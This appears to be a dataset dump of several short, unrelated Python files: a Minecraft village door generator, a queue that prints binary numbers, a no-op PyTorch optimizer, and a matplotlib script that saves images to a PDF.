:return:
"""
vil85 = list(vil_list)
for vil_TAGCompound in vil85:
villl = Village(vil_TAGCompound)
villl.del_doorz(doors_set)
if villl.is_empty:
vil_list.remove(vil_TAGCompound)
def village_gen(x1, villages, y_list, z1, halfDoorsInVillage, emptySpaces, axis, tick, cat):
"""
generates villages with doors n stuff
'x1' is the lowest block on the X axis
'z1' is the lowest block on the Z axis
'y' is the Y level of the lower block of the doors
:param axis: The axis along a single village is created;
'axis' is the axis on which the villages are, either the axis where the in the village doors are,
or the axis where the villages are, as in if i was to walk down that axis i would go through a door of every village
'villages' is the numbers of villages i want on this layer
'halfDoorsInVillage' is half of the doors in a village
'emptySpaces' is the space between the 2 blocks of doors /
the space between the first half of the doors and the second
'tick' the time in ticks, in a new file can be basicly anything but 0 and in an old file it has the be the same as
the other villages and the main tick of the file.
'cat' magic NBT file
"""
cat2 = cat["data"]
doors_coords_lists = []
doors_set = set()
for y in y_list:
doors_coords_lists += village_doors_coordinates(x1, villages, y, z1, halfDoorsInVillage, emptySpaces, axis)
for vill_coords_list in doors_coords_lists:
for single_door_coord in vill_coords_list:
doors_set.add(tuple(single_door_coord))
del_door(cat2['Villages'], doors_set)
for coordinates_list in doors_coords_lists:
vil = Village.create_village(tick)
for x, y, z in coordinates_list:
vil.add_door(create_door(tick, x, y, z))
cat2['Villages'].append(vil.get_vil())
def main():
cat1, tick = existing_village_file("./villagesCopy2.dat")
village_gen(-107, number_of_villages_to_generate, [132], 169, number_of_doors_to_generate / 2, 19, 'X', tick, cat1)
cat1.write_file("./villagesCopy2.dat")
if __name__ == '__main__':
main() |
7,197 | 2898506b9fd5b112f93a1ff6b010848244c398bd | from collections import deque
class Queue:
def __init__(self):
self.container = deque()
def enqueue(self, data):
self.container.appendleft(data)
def dequeue(self):
return self.container.pop()
def is_empty(self):
return len(self.container) == 0
def size(self):
return len(self.container)
def front(self):
if not self.is_empty():
return self.container[-1]
def binary_numbers(n):
queue = Queue()
queue.enqueue("1")
for i in range(n):
front = queue.front()
print(" ", front)
queue.enqueue(front + "0")
queue.enqueue(front + "1")
queue.dequeue()
if __name__ == '__main__':
binary_numbers(20) |
7,198 | 3c7237e5770dd5552c327dbf53451a2889ea8c6b | import torch
import typing
__all__ = ['NoOp']
class Null(torch.optim.Optimizer):
def __init__(self,
parameters: typing.Iterator[torch.nn.Parameter],
):
super(Null, self).__init__(parameters, {"lr": 0.0, "eps": 1e-8})
def step(self, closure=None):
if closure is not None:
closure()
return None
class NoOp(object):
def __init__(self,
parameters: typing.Iterator[torch.nn.Parameter],
):
self.optimizers = [Null(parameters)]
def step(self, closure=None):
return None |
7,199 | 146db68fb84569b914fa741457c595108088dc63 | from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
from scipy.misc import imread
import os
import numpy as np
files = [ "oracle.PNG",
"SQL.jpg" ]
def plotImage(f):
folder = "C:/temp/"
im = imread(os.path.join(folder, f)).astype(np.float32) / 255
plt.imshow(im)
a = plt.gca()
a.get_xaxis().set_visible(False) # We don't need axis ticks
a.get_yaxis().set_visible(False)
pp = PdfPages("c:/temp/page1.pdf")
plt.subplot(121)
plotImage(files[0])
plt.subplot(122)
plotImage(files[1])
pp.savefig(plt.gcf()) # This generates page 1
pp.savefig(plt.gcf()) # This generates page 2
pp.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.